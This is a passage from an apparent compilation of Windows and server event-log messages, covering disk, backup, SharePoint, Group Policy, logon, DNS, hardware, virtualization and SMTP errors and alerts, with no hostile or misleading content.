at Microsoft.Office.Server.Administration.SharedResourceProvider.GetAdministrationSiteUrl(SPUrlZone zone)
at Microsoft.Office.Server.ServerContext.GetAdministrationSiteUrl(SPUrlZone zone)
at Microsoft.Office.Server.Audience.AudienceSiteInfo..ctor(ServerContext serverContext, Boolean bCentral, Boolean bPublic, AudienceAccessRights AccessRights)
at Microsoft.Office.Server.Audience.AudienceManager.get_Audiences()
at Microsoft.Office.Server.Diagnostics.StaticSqmDataCollectionJob.RecordAudienceApplicationSspData(SharedResourceProvider ssp)
at Microsoft.Office.Server.Diagnostics.StaticSqmDataCollectionJob.RecordSspData(SharedResourceProvider ssp)
Message:
Free disk space for drive T:\ (ISBORA8_T) is below the configured limit of 2 percent. 2.00 percent of disk space (10239 Mb) are currently available on drive T:\.
Message:
Product: Microsoft Visual Studio 2005 Professional Edition - ENU -- Error 1718.File C:\WINDOWS\Installer\a4cb8.msp did not pass the digital signature check. For more information about a possible resolution for this problem, see http://go.microsoft.com/fwlink/?LinkId=73863.
Message:
The NTP server (null) isn't sync'd, time not set
Source:
Service Control Manager
Message:
The APC UPS Service service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.
Source:
Microsoft-Windows-WMI
Message:
Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Category:
Account Management
Message:
User Account Unlocked:
Target Account Name: gwashington
Target Domain: USA
Target Account ID: USA\gwashington
Caller User Name: sys.admin
Caller Domain: USA
Caller Logon ID: (0x0,0x41708D37)
Source:
Microsoft-Windows-Security-Auditing
Category:
Other System Events
Message:
Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.
Error Code: 2
Message:
Windows cannot query for the list of Group Policy objects. Check the event log for possible messages previously logged by the policy engine that describes the reason for this.
Message:
Logon Failure:
Reason: Unknown user name or bad password
User Name: My Name
Domain: MYDOMAIN
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: WORKSTATION
Message:
Free disk space for drive C:\ () is back above the configured limit of 500 Mb. 2389 Mb of disk space are currently available on drive C:\.
Source:
Microsoft Office 12
Message:
EventType office11shipassert, P1 1be6, P2 12.0.6215.0, P3 NIL, P4 NIL, P5 NIL, P6 NIL, P7 NIL, P8 NIL, P9 NIL, P10 NIL.
Source:
Windows SharePoint Services 3
Message:
The Execute method of job definition Microsoft.Office.Server.Administration.ApplicationServerAdministrationServiceJob (ID 693fe0b2-6c9f-47bf-9d1a-c6a2aa7cd3c3) threw an exception. More information is included below.
Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
Message:
Windows XP Service Pack 3 installation failed.
Access is denied.
Message:
Error 0x7d6 occurred while rendering message 0008-0000008949b3 for download for user user@emaildomain.com.
Category:
Detailed Tracking
Message:
The Windows Firewall has detected an application listening for incoming traffic.
Name: -
Path: C:\WINDOWS\system32\someprocess.exe
Process identifier: 3732
User account: SYSTEM
User domain: NT AUTHORITY
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 55751
Allowed: No
User notified: No
Source:
ActiveDocs Enterprise - Web Wizard
Message:
Error occured InitializeDeliveryServices services.Thread was being aborted. at DocumentDelivery.CheckQueues.CheckQueues() at DocumentDelivery.DeliveryServicesMonitor.RefreshDeliveryServices() at DocumentDelivery.DeliveryServicesMonitor.InitializeDeliveryServices() -
Source:
ActiveDocs Enterprise - Web Wizard
Message:
An error occured in the ActiveDocs Enterprise Service while checking queues for the database 'activedocs' on Server 'PROV109\ACTIVEDOCS' [D:\Applications\ActiveDocs\DocGenerator\activedocs.config]. Thread was being aborted. at WWTManager.WWTManager.CheckConversionAndDeliveryTimeOuts() at DocumentDelivery.CheckQueues.CheckQueues() - PROV109\ACTIVEDOCS - activedocs
Message:
SNMP Event Log Extension Agent did not initialize correctly.
Message:
Error processing registry parameters. Extension agent terminating.
Message:
Error positioning to end of log file -- seek to end of log failed. Handle specified is 635992. Return code from ReadEventLog is 1500.
Message:
SNMP Event Log Extension Agent did not initialize correctly.
Message:
Host ACLXIDS (Servers) changed its PING status from ERROR to OK. The reason for the status change was: 'Ping Successful (Rate:100%, Avg:0ms, Max:0ms, Min:0ms)'.
Message:
Error communicating with the Spooler system service. Open the Services snap-in and confirm that the Print Spooler service is running.
Message:
The redirector failed to determine the connection type.
Message:
The file system structure on the disk is corrupt and unusable. Please run the chkdsk utility on the volume NAME_OF_VOLUME.
Message:
3041 :BACKUP failed to complete the command BACKUP DATABASE [activedocs] TO DISK = N'd:\microsoft\mssqldata\MSSQL$ACTIVEDOCS\BACKUP\activedocs\activedocs_db_200809021915.BAK' WITH INIT , NOUNLOAD , NOSKIP , STATS = 10, NOFORMAT
Message:
18210 :BackupMedium::ReportIoError: write failure on backup device 'd:\microsoft\mssqldata\MSSQL$ACTIVEDOCS\BACKUP\activedocs\activedocs_db_200809021915.BAK'. Operating system error 112(There is not enough space on the disk.).
Message:
[1:1201:7] ATTACK-RESPONSES 403 Forbidden [Classification: Attempted Information Leak] [Priority: 2]: {TCP} 192.168.20.20:80 -> 216.86.148.242:48121
Message:
Logon attempt by: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon account: johndoe
Source Workstation:
Error Code: 0xC0000071
Message:
Package 'transbackup' failed.
Message:
The audit log was cleared Primary User Name: SYSTEM Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E7) Client User Name: nsi Client Domain: NSISENTRYTBOH Client Logon ID: (0x0,0x2568E)
Source:
Microsoft-Windows-GroupPolicy
Message:
The Group Policy Client Side Extension Software Installation was unable to apply one or more settings because the changes must be processed before system startup or user logon. The system will wait for Group Policy processing to finish completely before the next startup or logon for this user, and this may result in slow startup and boot performance.
Source:
Application Management Group Policy
Message:
The removal of the assignment of application MySQL Connector/ODBC 5.1 from policy Software Installation failed. The error was : The system cannot find the file specified.
Source:
Application Management Group Policy
Message:
Failed to apply changes to software installation settings. The installation of software deployed through Group Policy for this user has been delayed until the next logon because the changes must be applied before the user logon. The error was : The group policy framework should call the extension in the synchronous foreground policy refresh.
Source:
Server ActiveSync
Message:
IP-based AUTD failed to initialize because the processing of notifications could not be setup. Error code [0x80004005]. Verify that no other applications are currently bound to UDP port [2883], or try specifying a different port number.
Source:
Server ActiveSync
Message:
IP-based AUTD failed to initialize. Error code: [0x80004005].
Message:
Backup Exec Alert: Job Cancellation
(Server: "servername") (Job: "Daily") The job was canceled because the response to a media request alert was Cancel, or because the alert was configured to automatically respond with Cancel, or because the Backup Exec Job Engine service was stopped.
For more information, click the following link:
http://eventlookup.veritas.com/eventlookup/EventLookup.jhtml
Message:
Cleaning up corrupt content index metadata on d:\system volume information\catalog.wci. Index will be automatically restored by refiltering all documents.
Message:
Logon Failure: Reason: Unknown user name or bad password User Name: lgreenle Domain: mlsnet.local Logon Type: 7 Logon Process: User32 Authentication Package: Negotiate Workstation Name: MLS-APPS Caller User Name: MLS-APPS$ Caller Domain: MLSNET Caller Logon ID: (0x0,0x3E7) Caller Process ID: 9204 Transited Services: - Source Network Address: 192.168.0.76 Source Port: 39647
Message:
Logon Failure: Reason: Unknown user name or bad password User Name: lward Domain: Logon Type: 10 Logon Process: User32 Authentication Package: Negotiate Workstation Name: MLS-APPS Caller User Name: MLS-APPS$ Caller Domain: MLSNET Caller Logon ID: (0x0,0x3E7) Caller Process ID: 15676 Transited Services: - Source Network Address: 192.168.0.85 Source Port: 2235
Message:
Der Dateireplikationsdienst liest die Daten in den Systemdatenträger ein. Der Computer "SRV2" kann nicht zum Domänencontroller benannt werden, bis dieser Vorgang beendet ist. Das Systemvolumen wird dann unter SYSVOL freigegeben.
Um die SYSVOL-Freigabe zu überprüfen, geben Sie an der Eingabeaufforderung folgendes ein:
net share
Wenn der Dateireplikationsdienst den Scanvorgang beendet, erscheint die SYSVOL-Freigabe.
Die Initialisierung des Systemdatenträgers kann einige Zeit in Anspruch nehmen. Der Zeitaufwand ist von der Datenmenge im Systemdatenträger abhängig.
Category:
Performance Monitoring
Message:
The performance counter "PhysicalDisk(*)\Avg. Disk Queue Length" could not be monitored due to error "0xC0000BB8". Please make sure that the performance counter exists. If you are running a non-english version of Windows then performance counters are named in the language of the Operating System.
Message:
The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
Source:
Folder Redirection
Message:
Failed to perform redirection of folder Application Data. The new directories for the redirected folder could not be created. The folder is configured to be redirected to <\\MD61NTFS100\Home\%USERNAME%\Application Data>, the final expanded path was <\\MD61NTFS100\Home\E385776\Application Data>. The following error occurred: The system cannot find the path specified.
Message:
Activation context generation failed for "C:\someapp.exe". Dependent Assembly Microsoft.VC80.DebugCRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found. Please use sxstrace.exe for detailed diagnosis
Message:
The Windows PowerShell event log could not be cleared and backed up to file \\FS1\DEPARTMENTS\TECHNOLOGY\PRIVATE\EVENTLOGBACKUPS\VMUTIL WINDOWS POWERSHELL 04 11 2008 12 07.EVT due to the following error:
Access is denied.
.
Message:
Aborted connection 231292 to db: 'mydatabase' user: 'dbuser' host: '192.168.1.123' (Got an error reading communication packets)
Message:
Action "Desktop" was unable to create a mailslot for host "." due to error: The system cannot find the file specified.
Message:
Source: Process AnalyzerCube Processing Status: DTSRun: Loading...DTSRun: Executing...DTSRun OnStart: DTSStep_DTSOlapProcess.Task_1DTSRun OnError: DTSStep_DTSOlapProcess.Task_1, Error = -2147221384 (80040078) Error string: More than the maximum of 64,000 dimension member children for a single parent (dimension 'Zaaknummer', level 'Zaaknummer', member '141715'). Error source: Zaaknummer Help file: Help context: 1000440Error Detail Records:Error: 0 (0)
Source:
Windows SharePoint Services 3
Message:
The Execute method of job definition Microsoft.Office.Server.Administration.ApplicationServerAdministrationServiceJob (ID a778c03a-b4d5-47ad-b0d5-6130b9c8ba14) threw an exception. More information is included below.
Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
Message:
Mapi session '/O=Stercomm/OU=Amsterdam/cn=Recipients/cn=OBlanc' exceeded the maximum of 500 objects of type 'objtFolder'. For more information, click http://www.microsoft.com/contentredirect.asp.
Message:
There are multiple accounts with name MSSQLSvc/venus.partnershipassurance.int:3038 of type DS_SERVICE_PRINCIPAL_NAME.
Source:
MSExchangeTransport
Message:
A non-delivery report with a status code of 5.3.0 was generated for recipient rfc822
Source:
Application Error
Message:
Faulting application NICA.exe, version 1.1.0.60823, faulting module NICA.exe, version 1.1.0.60823, fault address 0x0002af39.
Message:
Host SCISTONETBOTZ (EMEA Netbotz) changed its PING status from OK to ERROR. The reason for the status change was: "100% packets lost".
Message:
The driver disabled the write cache on device \Device\Harddisk0\DR0.
Message:
TCP/IP has chosen to restrict the scale factor due to a network condition. This could be related to a problem in a network device and will cause degraded throughput.
Source:
Service Control Manager
Message:
Timeout (30000 milliseconds) waiting for the hpqwmiex service to connect.
Message:
Adamm Mover Error: Unload Rewind Failure!
Error = ERROR_IO_DEVICE
Drive = "HP 2"
2E6FDCE6-51A8-4918-B499-9233C643E041
Media = ""
00000000-0000-0000-0000-000000000000
Read Mode: SingleBlock(0), ScsiPass(0)
Write Mode: SingleBlock(1), ScsiPass(1)
Source:
MS ExchangeIS Mailbox
Message:
Error 1245 while disabling rule on public folder with rule ID <rule id number>. The folder ID of the public folder is in the data section of this event.
Message:
Cluster resource <resource> in Resource Group <group> failed.
Source:
Windows Server Update
Message:
Self-update is not working
Source:
Share Point Portal Administration
Message:
An exception occured in the search synchronizer.
Source:
Microsoft-Windows-WPD-MTPClassDriver
Category:
Driver Initilization.
Message:
MTP WPD Driver has failed to start. Error 0x8007001f.
Message:
The Netlogon service could not read a mailslot message from The system cannot find the path specified. due to the following error:
03000000
Source:
.NET Runtime 2.0 Error Reporting
Message:
EventType clr20r3, P1 toad.exe, P2 0.0.0.0, P3 46deb19e, P4 mscorlib, P5 2.0.0.0, P6 471ebc5b, P7 f46, P8 0, P9 n3ctrye2kn3c34sgl4zqyrbfte4m13nb, P10 NIL.
Source:
Sharepoint server 2007
Category:
Publishing Cache
Message:
Unable to connect publishing custom string handler for output caching. IIS Instance Id is '762598284', Url is 'http://spoint2007/....html'.
Message:
The name "DomainName :1d" could not be registered on the Interface with IP address w.x.y.z. The machine with the IP address w.x.y.a did not allow the name to be claimed by this machine.
Message:
Action "MSSQL Database", invoked by feature, "Performance Monitoring" was unable to connect to the database due to error "[HYT00] [Microsoft][ODBC SQL Server Driver]Timeout expired (0)". EventSentry will queue events and continue to attempt the delivery of events.
Message:
EVENT # 2521
EVENT LOG System
EVENT TYPE Error
SOURCE Wins
EVENT ID 4204
COMPUTERNAME FDS-NT5
DATE / TIME 2/12/2009 8:56:27 AM
MESSAGE WINS could not read from the User Datagram Protocol (UDP) socket.
BINARY DATA 0000: 01 15 00 00 46 27 00 00
Message:
Category Logon/Logoff
Type: success A
NT AUTHORITY\ANONYMOUS LOGON
Successful Network Logon:
User Name:
Domain:
Logon ID: (0x0,0x265B7)
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name:
Logon GUID: -
Category:
SPNEGO (Negotiator)
Message:
The Security System detected an authentication error for the server cifs/SERVER.domain.local. The failure code from authentication protocol Kerberos was "The specified user does not exist.
(0xc0000064)".
Source:
Report Server Windows Service (EVENTSENTRY)
Category:
Startup/Shutdown
Message:
The report server database is an invalid version.
Source:
Application Popup
Message:
An I/O operation initiated by the Registry failed unrecoverably. The Registry could not read in, or write out, or flush, one of the files that contain the system's image of the Registry.
Source:
User Profile Service
Message:
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards.
DETAIL -
2 user registry handles leaked from \Registry\User\S-1-5-21-3955188477-656860062-1151124159-1021:
Process 6540 (\Device\HarddiskVolume3\Windows\System32\winlogon.exe) has opened key \REGISTRY\USER\S-1-5-21-3955188477-656860062-1151124159-1021
Process 1356 (\Device\HarddiskVolume3\Windows\System32\svchost.exe) has opened key \REGISTRY\USER\S-1-5-21-3955188477-656860062-1151124159-1021\Printers\DevModePerUser
Message:
Soap error: Restoring data into SoapMapper GetAuthenticationTicketResult failed.
Message:
Soap error: Unspecified client error..
Message:
Service stopped successfully.
Message:
The print spooler failed to reopen an existing printer connection because it could not read the configuration information from the registry key S-1-5-18\Printers\Connections. The print spooler could not open the registry key. This can occur if the registry key is corrupt or missing, or if the registry recently became unavailable.
Message:
"Insufficient Runtime Available"
Message:
Memory module #5 has exceeded its threshold of correctable errors. Subsequent correctable memory errors will continue to be corrected.
Source:
Windows Search Service
Message:
A document ID cannot be allocated.
Context: Windows Application, SystemIndex Catalog
Details:
The content index server cannot update or access information because of a database error. Stop and restart the search service. If the problem persists, reset and recrawl the content index. In some cases it may be necessary to delete and recreate the content index. (0x8004117f)
Message:
The system failed to register host (A or AAAA) resource records (RRs) for network adapter
with settings:
Adapter Name : 27E49756-7394-4750-8CDC-8D3EAF944953
Host Name : YOURSERVER
Primary Domain Suffix : yourdomain.local
DNS server list :
192.168.2.10, 192.168.2.11
Sent update to server : 192.168.2.10:53
IP Address(es) :
192.168.2.95
The reason the system could not register these RRs was because of a security related problem. The cause of this could be (a) your computer does not have permissions to register and update the specific DNS domain name set for this adapter, or (b) there might have been a problem negotiating valid credentials with the DNS server during the processing of the update request.
You can manually retry DNS registration of the network adapter and its settings by typing "ipconfig /registerdns" at the command prompt. If problems still persist, contact your DNS server or network systems administrator. For specific error code, see the record data displayed below.
Message:
Scope, 192.168.1.0, is 95 percent full with only 1 IP addresses remaining.
Message:
The Apache service named reported the following error:
>>> httpd.exe: Syntax error on line 116 of C:/Program Files (x86)/CollabNet Subversion Server/httpd/conf/httpd.conf: Cannot load C:/Program Files (x86)/CollabNet Subversion Server/httpd/modules/mod_dav_svn.so into server: The specified module could not be found.
Source:
Microsoft-Windows-Security-Auditing
Message:
An account was logged off.
Subject:
Security ID: TESTGROUND\cacheduser
Account Name: cacheduser
Account Domain: TESTGROUND
Logon ID: 0xbed3f1
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
Source:
Microsoft-Windows-Security-Auditing
Message:
User initiated logoff:
Subject:
Security ID: TESTGROUND\cacheduser
Account Name: cacheduser
Account Domain: TESTGROUND
Logon ID: 0xbed3f1
This event is generated when a logoff is initiated but the token reference count is not zero and the logon session cannot be destroyed. No further user-initiated activity can occur. This event can be interpreted as a logoff event.
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Redundancy lost
Redundancy unit: System Board PS Redundancy
Chassis location: Main System Chassis
Previous redundancy state was: Normal
Message:
Power supply #1 has failed.
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system is in a failed state. Restore power or replace the failed power supply.
Chassis: '0'; Bay: '1'
[SNMP TRAP: 6050 in CPQHLTH.MIB]
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has lost redundancy. Restore power or replace any failed or missing power supplies.
Chassis: '0'
[SNMP TRAP: 6032 in CPQHLTH.MIB]
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has been returned to the OK state.
Chassis: '0'; Bay: '1'
[SNMP TRAP: 6048 in CPQHLTH.MIB]
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has returned to a redundant state.
Chassis: '0'
[SNMP TRAP: 6054 in CPQHLTH.MIB]
Source:
Trend Micro Security Server
Message:
Threat Alert
OfficeScan detected Cryp_Neb-2 on COMPUTERNAME(user.name) in MyDomain domains.
File: C:\Software\Infected.zip (Infected.exe)
Detection date: 6/17/2009 21:45:17
Action: No action
Category:
1184 (no category messagefile registered)
Message:
Error (9241), SMTP notification error: smtplib.SMTPException: No suitable authentication method found. (failure)
pid="3756:236"
Message:
The description for Event ID ( 1 ) in Source ( LGTO_Sync ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: , Sync Stop done.
Source:
Service Control Manager
Message:
The following boot-start or system-start driver(s) failed to load: storflt
Message:
NIC driver on 'COMPUTER' cannot load because it is incompatible with the server virtualization stack. Server version 2 Client version 1 (VMID D03E098F-B772-4AC4-B434-37527FDEF56A).
Source:
Service Control Manager
Message:
EVENT # 9697313
EVENT LOG System
EVENT TYPE Error
SOURCE Service Control Manager
EVENT ID 7011
COMPUTERNAME SERVER
DATE / TIME 7/28/2009 8:11:23 PM
MESSAGE Timeout (30000 milliseconds) waiting for a transaction response from the SharedAccess service.
Source:
Application error
Message:
Faulting application wmiprvse.exe, version 5.2.3790.0, faulting module ntdll.dll, version 5.2.3790.0, fault address 0x0002caa2.
Category:
Service Monitoring
Message:
The status for driver Netaapl (Apple Mobile Device Ethernet Service) changed from Running to Stopped.
Message:
The DNS server encountered a packet addressed to itself on IP address xxx.xxx.xxx.xxx. The packet is for the DNS name "au.download.windowsupdate.com.". The packet will be discarded. This condition usually indicates a configuration error.
Check the following areas for possible self-send configuration errors:
1) Forwarders list. (DNS servers should not forward to themselves).
2) Master lists of secondary zones.
3) Notify lists of primary zones.
4) Delegations of subzones. Must not contain NS record for this DNS server unless subzone is also on this server.
5) Root hints.
Example of self-delegation:
-> This DNS server dns1.example.microsoft.com is the primary for the zone example.microsoft.com.
-> The example.microsoft.com zone contains a delegation of bar.example.microsoft.com to dns1.example.microsoft.com,
(bar.example.microsoft.com NS dns1.example.microsoft.com)
-> BUT the bar.example.microsoft.com zone is NOT on this server.
Note, you should make this delegation check (with nslookup or DNS manager) both on this DNS server and on the server(s) you delegated the subzone to. It is possible that the delegation was done correctly, but that the primary DNS for the subzone, has any incorrect NS record pointing back at this server. If this incorrect NS record is cached at this server, then the self-send could result. If found, the subzone DNS server admin should remove the offending NS record.
You can use the DNS server debug logging facility to track down the cause of this problem.
Source:
Windows Server Update Services
Message:
Some client computers have not reported back to the server in the last 30 days. 4 have been detected so far.
Message:
The backup file for action "DBMYSQL" has events queued, but the "DBMYSQL" action is currently disabled. The backup file for this action has been backed up to file "C:\Windows\TEMP\eventsentry_backup_f98ff348-8384-4ae8-ae76-6818e4e13765.tmp.backup" and the original file has been deleted.
Source:
SQL Server ODBC driver support error
Message:
Unable to load SQL Server ODBC driver resource DLL. The application cannot continue.
Message:
The number of events cached for action "MSSQL Database", which has been unreachable, exceeded 8192 events. If this action is no longer in use then you should disable or delete the action so that events are no longer cached. EventSentry will continue to cache events until the maximum size of the temporary backup file "C:\WINDOWS\TEMP\eventsentry_backup_xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx.tmp" (32 Mb) is reached. 133952 events are currently cached, the backup file size is 32 Mb.
Message:
Would be blocked by port blocking rule (rule is in warn-only mode) (Anti-virus Standard Protection:Prevent mass mailing worms from sending mail).
Message:
Failed to create restore point (Process = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Description = Scheduled Checkpoint; Error = 0x80070422).
Message:
The kerberos client received a KRB_AP_ERR_MODIFIED error from the server computerA$. The target name used was cifs/computerB.mydomain.local. This indicates that the password used to encrypt the kerberos service ticket is different than that on the target server. Commonly, this is due to identically named machine accounts in the target realm (MYDOMAIN.LOCAL), and the client realm. Please contact your system administrator.
Category:
Service Monitoring
Message:
The status for driver pssdk41 (PsSdk41) changed from Stopped to Running.
Additional Service Information:
Startup type: Manual
Executable: \??\C:\WINDOWS\system32\Drivers\pssdk41.sys
Source:
Microsoft-Windows-CAPI2
Message:
Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddCoreCsiFiles : BeginFileEnumeration() failed.
System Error:
Access is denied.
..
Category:
Heartbeat Monitoring
Message:
The PING status of host <HOSTNAME> remains at ERROR due to error "gethostbyname: The requested name is valid, but no data of the requested type was found. ".
Message:
Microsoft FrontPage Server Extensions:
Error #3005f Message: Unable to read configuration for Microsoft Internet Information Server.
Source:
MSExchangeFBPublish
Message:
Unable to prepare message table for polling thread processing on virtual machine WCC-EXCHANGE-4. The error number is 0x80040115. Make sure that the Microsoft Exchange Information Store service is running.
Message:
The parent partition uses a different VMBus version. You need to Install a matching VMBus version in this guest installation.
Message:
A storage device in 'COMPUTERNAME' cannot load because it is incompatible with the server virtualization stack. Server version 2.0 Client version 4.2(VMID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX).
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Log size is near or at capacity
Log type: ESM
Message:
The platform firmware has corrupted memory across the previous system power transition. Please check for updated firmware for your system.
Message:
The following fatal alert was generated: 10. The internal error state is 10.
- System
- Provider
[ Name] Schannel
[ Guid] {1F678132-5938-4686-9FDC-C8FF68F15C85}
EventID 36888
Version 0
Level 2
Task 0
Opcode 0
Keywords 0x8000000000000000
- TimeCreated
[ SystemTime] 2009-10-29T14:17:42.310964400Z
EventRecordID 27115
Correlation
- Execution
[ ProcessID] 500
[ ThreadID] 4548
Channel System
Computer OfficePC
- Security
[ UserID] S-1-5-18
- EventData
AlertDesc 10
ErrorState 10
Message:
File backup was cancelled by the user.
Message:
Remote Insight Agent: The Remote Insight Board/Integrated Lights-Out has detected a controller interface error.
[SNMP TRAP: 9006 in CPQSM2.MIB]
Source:
VDS Basic Provider
Message:
Unexpected failure. Error code: 490@01010004
Message:
Unable to connect to SMTP host smtp.gmail.com due to error "Timeout.". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.
Unable to connect to SMTP host %1 due to error "%2". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.
Message:
Error during SMTP communication with SMTP host "192.168.1.48". After sending "." the following error occurred: "[10057] Socket is not connected".
Error during SMTP communication with SMTP host "%1". After sending "%2" the following error occurred: "%3".
Message:
Unable to connect to SMTP host 192.168.1.48 due to error [10060] Connection timed out. Will try backup smtp host smtp.gmail.com now.
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.
Message:
Action "Event log to text file" was unable to create/open file "C:\EventSentry\eventsentry_events.txt" due to error: Access is Denied.
Action "%1" was unable to create/open file "%2" due to error: %3
Message:
While transmitting or receiving data, the server encountered a network error. Occassional errors are expected, but large amounts of these indicate a possible error in your network configuration. The error status code is contained within the returned data (formatted as Words) and may point you towards the problem.
Source:
Microsoft-Windows-Folder Redirection
Message:
Folder redirection policy application has been delayed until the next logon because the group policy logon optimization is in effect.
Message:
AEN: SECTOR_REPAIR (port=1, LBA=0xEFFD80)
Message:
AEN: DEGRADED_UNIT (unit=0, port=1)
Message:
EventSentry determined that the recommended management suite ("OpenManage") from the hardware manufacturer (Dell) is either not installed or not currently running on this server. Without this software, EventSentry will not be able to alert you of critical hardware warnings and/or errors, such as a hard drive failure in a RAID. Please visit the manufacturer's web site to obtain more information and install the recommended management suite.
Additional Information:
Manufacturer: Dell
Model: PowerEdge 1900
Bios Version: 2.2.6
Message:
Activation context generation failed for "somefile.dll".Error in manifest or policy file "Microsoft.VC90.CRT\Microsoft.VC90.CRT.MANIFEST" on line 4. Component identity found in manifest does not match the identity of the component requested. Reference is Microsoft.VC90.CRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b", type="win32", version="9.0.21022.8". Definition is Microsoft.VC90.CRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b", type="win32", version="9.0.30729.4148". Please use sxstrace.exe for detailed diagnosis.
Message:
The system failed to register host (A or AAAA) resource records for network adapter
with settings:
Adapter Name : {D37428FB-D073-4403-87B8-3941F1C3A2B4}
Host Name : MYSERVER
Primary Domain Suffix : mydomain.local
DNS server list :
fec0:0:0:ffff::1, fec0:0:0:ffff::2, fec0:0:0:ffff::3
Sent update to server : <?>
IP Address(es) :
192.168.111.1
Either the DNS server does not support the DNS dynamic update protocol or the authoritative zone for the specified DNS domain name does not accept dynamic updates.
To register the DNS host (A or AAAA) resource records using the specific DNS domain name and IP addresses for this adapter, contact your DNS server or network systems administrator.
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD missing: SasAddr=0x5000c50001cde56d, ArrayRef=1, RowIndex=0x3, EnclPd=0xff, Slot=5.
: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PDs missing from configuration at boot: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: VDs missing drives and will go offline at boot: 01: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Message:
Controller event log: VD 01/1 is now OFFLINE: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD 04(e0/s4) is not a certified drive: Controller 0 (PERC 5/i Integrated)
Message:
DCOM got error "%2147944122" from the computer xxxxxx when attempting to activate the server:
xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxxx
Message:
Action "MSSQL Database", invoked by feature "Software Monitoring", was unable to connect to the database due to error "[01000] [Microsoft][ODBC SQL Server Driver][TCP/IP Sockets]ConnectionOpen (Connect()). (11004)". EventSentry will queue events and continue to attempt the delivery of events.
Message:
The device 'Storage miniport driver' (VMBUS\1481C722-3FBE-4DD2-9468-7D8F1396B27D\1&3189fc23&0&{1481c722-3fbe-4dd2-9468-7d8f1396b27d}) disappeared from the system without first being prepared for removal.
Message:
The device 'Msft Virtual Disk SCSI Disk Device' (SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&240474ae&0&000000) disappeared from the system without first being prepared for removal.
Message:
The backup did not complete because of an error writing to the backup location B:\. The error is: The backup location cannot be found or is not valid. Review your backup settings and check the backup location. (0x81000006).
Message:
Windows cannot open the 64-bit extensible counter DLL aspnet_state in a 32-bit environment. Contact the file vendor to obtain a 32-bit version. Alternatively if you are running a 64-bit native environment, you can open the 64-bit extensible counter DLL by using the 64-bit version of Performance Monitor. To use this tool, open the Windows folder, open the System32 folder, and then start Perfmon.exe
Message:
The Virtual Storage Filter Driver is disabled through the registry. It is inactive for all disk drives.
Source:
Microsoft-Windows-Security-Auditing
Category:
System Integrity
Message:
Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.
File Name: \Device\HarddiskVolume2\Windows\System32\l3codeca.acm
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Log size is full
Log type: ESM
Message:
Product: Adobe Reader 9.3 - Update '{AC76BA86-7AD7-0000-2550-7A8C40000934}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
Message:
Networking driver on 'VMCOMPUTERNAME' loaded but has a different version from the server. Server version 3.2 Client version 0.2 (Virtual machine ID 041A17DA-19CF-4667-9253-48DBA40CB726). The device will work, but this is an unsupported configuration. This means that technical support will not be provided until this problem is resolved. To fix this problem, upgrade the integration services. To upgrade, connect to the virtual machine and select Insert Integration Services Setup Disk from the Action menu.
Message:
AEN: APORT_TIMEOUT_DETECTED (port=0)
Source:
service control manager
Message:
The Debug Diagnostic service entered the running state
Category:
Exchange VSS Writer
Message:
Exchange VSS Writer (instance 6c1b73a7-5922-480e-a8ef-f89e3b34780a:20) has unsuccessfully completed the backup of storage group 'First Storage Group'. No log files have been truncated for this storage group.
Source:
Microsoft-Windows-Eventlog
Message:
The security log is now full.
Source:
